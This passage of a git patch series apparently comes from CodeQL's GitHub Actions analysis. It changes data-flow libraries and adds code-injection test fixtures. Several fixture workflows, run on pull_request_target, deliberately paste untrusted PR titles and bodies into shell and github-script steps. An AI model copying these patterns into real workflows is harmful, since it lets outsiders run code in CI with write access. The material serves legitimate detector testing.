u.getValue().suffix(u.getValue().indexOf("@") + 1) } override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" From ef549ef79564ece1975a6f8df03208175f93b2e6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:41:03 +0200 Subject: [PATCH 0529/1267] Add Outputs nodes as CFG/DFG nodes --- ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 1fe4a3e7e1c..8a6e52309fb 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -148,7 +148,7 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos rank[i](AstNode child, Location l | ( child = this.(CompositeAction).getAnInput() or - child = this.(CompositeAction).getAnOutputExpr() or + child = this.(CompositeAction).getOutputs() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,7 +172,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { rank[i](AstNode child, Location l | ( child = this.(ReusableWorkflow).getAnInput() or - child = this.(ReusableWorkflow).getAnOutputExpr() or + child = this.(ReusableWorkflow).getOutputs() or child = this.(ReusableWorkflow).getStrategy() or child = this.(ReusableWorkflow).getAJob() ) and @@ -202,7 +202,7 @@ private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getOutputExpr(_) and l = child.getLocation() + child = super.getAnOutputExpr() and l = child.getLocation() | child order by From 7c2386bbeea2322424ac0064c2fd0eee7b92bcfe Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:42:52 +0200 Subject: [PATCH 0530/1267] Simplify callable/call matches --- .../dataflow/internal/DataFlowPrivate.qll | 45 ++----------------- 1 file changed, 4 insertions(+), 41 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 529bbc82087..3226e41ba2f 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -70,7 +70,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a local action, 3rd party action or a reusable workflow get called + * A call corresponds to a Uses steps where a composite action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof Uses } @@ -89,23 +89,6 @@ class DataFlowCall instanceof Cfg::Node { Location getLocation() { result = this.(Cfg::Node).getLocation() } } -string getRepoRoot() { - exists(Workflow w | - w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and - result = - w.getLocation() - .getFile() - .getRelativePath() - .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and - // exclude workflow_enum reusable workflows directory root - not result.indexOf(".github/reusable_workflows/") > -1 - or - not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and - not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and - result = "" - ) -} - /** * A Cfg scope that can be called */ @@ -113,22 +96,8 @@ class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } string getName() { - if this instanceof ReusableWorkflow - then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() // or - else - if this instanceof CompositeAction - then - result = - this.(CompositeAction) - .getLocation() - .getFile() - .getRelativePath() - .prefix(this.(CompositeAction) - .getLocation() - .getFile() - .getRelativePath() - .indexOf(["/action.yml", "/action.yaml"])) - else none() + result = this.(ReusableWorkflowImpl).getResolvedPath() or + result = this.(CompositeActionImpl).getResolvedPath() } /** Gets a best-effort total ordering. */ @@ -150,13 +119,7 @@ class NormalReturn extends ReturnKind, TNormalReturn { } /** Gets a viable implementation of the target of the given `Call`. */ -DataFlowCallable viableCallable(DataFlowCall c) { - c.getName() = result.getName() or - c.getName() = result.getName().replaceAll(getRepoRoot(), "") or - // special case for reusable workflows downloaded by the workflow_enum action - c.getName() = - result.getName().replaceAll(getRepoRoot(), "").replaceAll(".github/reusable_workflows/", "") -} +DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } /** * Gets a node that can read the value returned from `call` with return kind From 4fc9e3f0f1df5e091d47c200ae1b653d57a177f5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:43:10 +0200 Subject: [PATCH 0531/1267] Add Composite action's outputs as a return node --- ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index fbaf44c282f..9c05256e2fa 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -96,7 +96,10 @@ class ReturnNode extends ExprNode { ReturnNode() { this.asExpr() = outputs and - outputs = any(ReusableWorkflow s).getOutputs() + ( + exists(ReusableWorkflow w | w.getOutputs() = outputs) or + exists(CompositeAction a | a.getOutputs() = outputs) + ) } ReturnKind getKind() { result = TNormalReturn() } From e8a667fdc6f167209df36cc7d03114c23c58d03e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:43:31 +0200 Subject: [PATCH 0532/1267] Add new tests --- .../.github/actions/action5/action.yml | 8 ++ .../.github/actions/clone-repo/action.yaml | 46 +++++++++ .../.github/workflows/reusable-workflow.yml | 95 +++++++++++++++++++ .../workflows/composite-action-caller-3.yml | 1 + .../workflows/composite-action-caller-4.yml | 18 ++++ .../workflows/reusable-workflow-caller-3.yml | 10 ++ 6 files changed, 178 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index 13c246f4ff3..a03c27be226 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -9,6 +9,9 @@ outputs: result: description: "result" value: ${{ steps.step.outputs.result }} + result2: + description: "result" + value: ${{ steps.step2.outputs.result2 }} runs: using: 'composite' steps: @@ -20,6 +23,11 @@ runs: FOO: ${{ inputs.taint }} shell: bash run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT + - id: step2 + env: + FOO2: ${{ github.event.pull_request.body }} + shell: bash + run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink id: sink shell: bash diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml new file mode 100644 index 00000000000..75d7e79c1e4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -0,0 +1,46 @@ +name: Clone repository +description: Clone repository +inputs: + title: + description: Title + required: true + forked-pr: + description: Whether the event is operating from a forked PR + required: true + fetch-depth: + description: Fetch depth for actions/checkout + default: "1" +outputs: + result: + description: "result" + value: ${{ steps.out.outputs.replaced }} + +runs: + using: composite + steps: + - shell: bash + run: echo "${{ inputs.title }}" + - uses: frabert/replace-string-action@v2.5 + id: out + with: + pattern: "\"" + string: ${{ inputs.title }} + replace-with: 'foo' + flags: g + - id: out2 + env: + FOO: ${{ inputs.title }} + shell: bash + run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT + - name: Clone branch + if: "!fromJSON(inputs.forked-pr)" + uses: actions/checkout@v3 + with: + fetch-depth: ${{ inputs.fetch-depth }} + - name: Clone forked PR + if: fromJSON(inputs.forked-pr) + uses: actions/checkout@v3 + with: + ref: refs/pull/${{ github.event.number }}/merge + fetch-depth: ${{ inputs.fetch-depth }} + diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml new file mode 100644 index 00000000000..0c4aa93c7a5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml @@ -0,0 +1,95 @@ +name: changelog + +on: + workflow_call: + inputs: + taint: + description: taint + type: string + required: true + default: "" + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - run: echo "${{ inputs.taint }}" + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml index 231cddd0b88..62ad9ba779c 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml @@ -11,4 +11,5 @@ jobs: with: taint: ${{ github.event.comment.body }} - run: echo "${{ steps.foo.outputs.result }}" + - run: echo "${{ steps.foo.outputs.result2 }}" diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml new file mode 100644 index 00000000000..e6566012732 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml @@ -0,0 +1,18 @@ + +name: Issue Workflow +on: + pull_request_target: +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - name: Clone branch + id: clone + uses: TestOrg/TestRepo/.github/actions/clone-repo@main + with: + title: ${{ github.event.pull_request.title }} + forked-pr: true + fetch-depth: 2 + - run: echo "${{ steps.clone.outputs.result }}" + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml new file mode 100644 index 00000000000..39dfafcf023 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml @@ -0,0 +1,10 @@ +name: Caller + +on: + pull_request_target: + +jobs: + test: + uses: TestOrg/TestRepo/.github/workflows/reusable-workflow.yml@main + with: + taint: ${{ github.event.pull_request.title }} From f095622a9bfde15828e876e23194a774c0b93686 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:50:59 +0200 Subject: [PATCH 0533/1267] Update expected test results --- .../CWE-020/ReusableWorkflowsSinks.expected | 16 +++++ .../CWE-094/CodeInjectionCritical.expected | 66 +++++++++++++++++-- .../CWE-094/CodeInjectionMedium.expected | 56 +++++++++++++++- .../CWE-829/UnpinnedActionsTag.expected | 4 +- 4 files changed, 132 insertions(+), 10 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index f2178960774..18e9f0186df 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,7 +1,23 @@ edges +| .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | nodes +| .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | semmle.label | Job: call2 [workflow-output1] | +| .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | semmle.label | needs.call2.outputs.workflow-output1 | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | semmle.label | output Job outputs node [workflow-output1] | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | semmle.label | steps.step1.outputs.step-output | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 818b106b6d7..749d0524415 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,5 +1,20 @@ edges -| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | provenance | | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | provenance | | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | provenance | | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -30,7 +45,13 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | provenance | | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | provenance | | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | @@ -72,6 +93,7 @@ edges | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -129,8 +151,26 @@ nodes | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | -| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | semmle.label | output Job outputs node [result2] | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | semmle.label | steps.step.outputs.result | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | semmle.label | steps.step2.outputs.result2 | +| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | semmle.label | Run Step: step [result] | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | semmle.label | Run Step: step2 [result2] | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | semmle.label | input title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | semmle.label | steps.out.outputs.replaced | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -183,7 +223,14 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | semmle.label | Uses Step: foo [result2] | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | semmle.label | Uses Step: foo [result] | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | semmle.label | steps.foo.outputs.result | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | semmle.label | steps.foo.outputs.result2 | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | semmle.label | Uses Step: clone [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | semmle.label | steps.clone.outputs.result | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | @@ -289,6 +336,7 @@ nodes | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | 